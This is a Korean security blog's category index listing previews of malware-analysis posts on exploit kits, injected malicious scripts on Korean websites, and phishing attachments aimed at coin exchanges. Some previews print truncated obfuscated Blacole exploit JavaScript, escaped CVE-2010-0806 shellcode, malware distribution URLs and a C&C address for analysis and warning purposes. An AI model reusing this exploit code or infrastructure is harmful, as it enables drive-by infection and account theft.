본문 바로가기

악성코드

[악성코드 유포] 코인(토큰) 상장 문의 메일을 통한 한글 악성코드 유포 분석 1. 개요 최근 APT(Advanced Persistent Threat) 공격이 증가하고 있는 추세입니다. 최근에는 코인 거래소가 활성화되고, 돈이 되면서 거래소의 관계자를 노리기 위한 공격이 주를 이루고 있습니다. 이번에 분석하게 된 파일은 코인 상장 신청서를 통해 주요 코인거래소에 유포된 것으로 확인된 한글 파일을 간단하게 분석하였습니다. “해당 메일은 코인원 계정에 발송된 것으로 확인되었습니다.” 2. 최초 이메일 발송 정보 2. 파일 정보 파일명 [WhitePaper+소개]신규코인_상장_신청서2.hwp MD5 95fe089b63c095bfb2b25e8c6914d19d 한글 파일 제목 EXRAYA 백서 파일 생성 날짜 2019년 11월 3일 일요일 오후 4:21:45 비밀번호 12345 3. 세부 .. 더보기
CK Exploit Kit 4.13에 대한 간단 정리 회사를 퇴사하고 나서 가끔씩 글을 쓸 예정 입니다.정보가 많이 부족하긴 하지만 악성 스크립트 (국내 + 해외) / 파일분석 등을 적을 예정 입니다.포스팅을 하는 이유는 그냥 심심해서 입니다. 1. 발견 사이트 (유포지) cocoalba.kr/autojump/ad_xxxx/index.html 2. 최종 파일leeve.co.kr/apps/up.exe (현재 404)MD5 : 0952d38bf8b3f026cb3c41c87db338a7C&C : r.pengyou.com/fcg-bin/cgi_get_portrait.fcg?uins=2889622357[VT 결과]virustotal.com/ko/file/1dd1dbd6631b8b0b87d7bbab7aff004c983dbe87ba6c9e7fed851de4786e6ae.. 더보기
Exploit:JS/Blacole.KH (Microsoft) 우연히 해외 사이트를 보던 도중 Exploit 을 보아서 이렇게 써봅니다. 우선은 배치된 코드는 다음과 같습니다. try{bgewg346tr++}catch(aszx){try{dsgdsg-142}catch(dsfsd){try{("".substr+"")()}catch(ehwdsh){try{window.document.body++}catch(gdsgsdg){dbshre=204;}}}} if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;} asgq=new Array (1,2,99,97,28,32,93,105,94,113,101,94,104,111,42,95,94,11.. 더보기
네이트온에서 새로운 형태로 유포되는 악성코드 !! 기존의 바로 악성코드 받는 방식이 아닌 스크립트 삽입을 통해서 연결되기에 이렇게 글을 써 봅니다. 네이트온 악성코드는 기존의 바로 받는 방식이었지만 지금은 다양하게 유포되고 있습니다. 최근에 따라 이렇게 보여지고 있으므로 글로 남겨 봅니다. 어제 받은 네이트온 악성코드 쪽지 입니다. 링크를 클릭시 기존에는 바로 다운로드 링크로 넘어갔지만 지금은 그 사이트 안에 코드삽입을 해놓으므로 악성코드를 감염시키는 역활을 합니다 ! 위에 링크에 따라 들어가면 취약한 한 초등학교 홈페이지로 넘어갑니다. 이와 같이 보이는곳에는 아무렇지 않은 현상이 나타납니다. 하지만 그안에 소스 자체를 본다면 이 사이트가 또 다른 사이트와 연결되는 스크립트가 있다는 것을 알 수 있습니다. 자세한 소스를 본다면 이렇게 나타나 있습니다. .. 더보기
보안xx 현재 악성코드 유포중 !! 현재 보안xx 에는 악성코드 js가 삽입 되어있다 !! 사이트에서 뉴스를 보던중 이상한 링크를 발견 하였다. 처음에는 설마 하였지만 파일을 살펴보니 이상한 사이트로 연결되는것을 보았다. 이 파일은 온라인 게임핵으로 보이며 계정탈취를 위해 쓰이는 것으로 판단이 되어진다. 이 파일은 현재 내가 글쓰고 있는 이시간에도 소스안에 박혀있으며 뉴스 페이지인만큼 많은 피해가 우려가 된다. 역시 주말에는 악성코드의 놀이터인거 같다 !! 원본 페이지 : http://www.boxx.com/news/articleView.html?idxno=2507 유포 페이지 : http://58xxx.com/js.js ~> http://58xxx.com/ad.htm ~> http://58xxx.com/top.jpg ~> 최종파일 다운 .. 더보기
휴대폰 통신사 큐x텔 악성 스크립트 삽입 !! 지금 현재 모 휴대폰 통신사 큐x텔에는 악성 아이프레임이 삽입되어서 연결하고 있는것으로 보인다,. 사이트 내 소스를 보면 금방 악성코드가 삽입되어 있는것을 볼 수가 있다 !! 더보기
http://cpm2.XX66.org:88/Xo/Xi05.htm : JS:CVE-2010-0806-AK 요즘 중국 사이트에서 악성코드가 삽입되는 사이트를 하루에 하나씩 보는거 같다. 오늘도 메일을 받던중 악성코드 사이트로 연결되는 사이트를 발견하였다. 이번에도 코드 자체가 평소와 같아서 사이트에서 최종파일 칮기란 매우 쉬웠다. 최종파일의 역활은 아직까지 하는것은 모르겠지만 안랩에서는 ASD로 때려 잡았다 ! 코드의 앞부분과 뒷부분은 어제와 마찬가지로 '+' 만 빼고 한다면 쉽게 최종파일까지 근접할수 있을것이다. %u5858%u5858%u10EB%u4B5B%uC'+'933%uB96'+'6%u03B8%u34'+'80%uBD0B%uFA'+'E2%u05E'+'B%uEBE8 (중략) %uc9c9%u87cd%u9292%ucece%u93ce%ud8ce%u84ce%uce84%ude93%u87d3%u8585%uc592%u.. 더보기
[안철수연구소] 남아공 월드컵을 악용한 악성코드 주의보 글로벌 통합보안 기업인 안철수연구소[대표 김홍선 www.ahnlab.com]가 최근 ‘ASEC[시큐리티대응센터] 리포트’에서 발표한 최신 보안 이슈 동향에 따르면, 사용자의 재산과 금전을 노리는 악성코드 감염 4월 보고건수는 3월 악성코드 감염 보고건수 757만 여건에 비해 약 26% 증가한 1,030만 여건으로 나타났다. 특히 월드컵 등을 앞두고 사회적으로 이슈가 되고 있는 사안을 이용해 다양한 악성코드 유포 시도가 증가할 것으로 예상되어 사용자들의 주의가 요망된다. 특히, 오는 6월 개최되는 2010 남아공 월드컵 관련 내용의 메일로 위장해 어도비 아크로벳 리더의 특정 이미지[TIFF] 파싱[Parsing, 구문분석] 관련 취약점 악용하는 악성코드 유포 사례가 해외에서 보고 됐다. 악의적인 PDF 는.. 더보기
맥아피(McAfee) 오진(false positive) 문제를 악용하는 스케어웨어 해커들 맥아피(McAfee) 오진(false positive) 문제를 악용하는 스케어웨어 해커들 해커들이 전세계 수많은 컴퓨터들을 스스로 반복적으로 재부팅하게 하는 맥아피(McAfee) 안티바이러스 제품과 관련된 문제를 악용하고 있습니다. 뉴욕 타임즈와 기타 많은 뉴스 매체들은 4월21일, 맥아피 안티바이러스 제품이 검진 업데이트(detection update)를 한 이후에 정상적인 Windows 파일인 svxhost.exe 파일을 “W32/Wecorl.a”로 잘못 인식하여 컴퓨터가 제대로 실행되지 못하게 만드는 문제를 일으켜 피해를 끼치고 있는 것에 대해 보도하였습니다. 칭찬할 만한 것은, 온라인 커뮤니티에서 그 문제에 대해 토론한 맥아피가 고객들에게 사과를 하고, 잘못된 업데이트를 중지하고, 감염된 컴퓨터를.. 더보기
프루나 무비서치 악성코드 유포중 !! 내가 발견한 시각은 오늘 아침 9시경이었다. 예전에도 유포했다 월요일에 없어졌던 서버였지만 오늘 다시 보니 time out 위장되어 있는 사이트였다. 프루나라는 메인 페이지에서는 이 링크를 볼수없다. 여담이지만 이렇게 프루나에 꼭꼭 숨겨놓아서 어떤 사용자를 감염 시킨다는지 이해가 가지 않았다. 사진과 같이 프루나 메인페이지에서는 젼혀 search_list3.asp 가 보이지 않으므로 정상 접속에는 이상이 없다. 이 접속 경로는 http://vxd.prxxa.com/search/search_list3.asp 이쪽으로 되어있으며 이것 또한 익스플로러로 접속시 time out 이라는 문구만 보일뿐 세부 코드는 보이지 않는다! 하지만 도구를 통해서 본다면 세부 코드가 나오는 것으로 볼수있다. 이것 또한 처음에는.. 더보기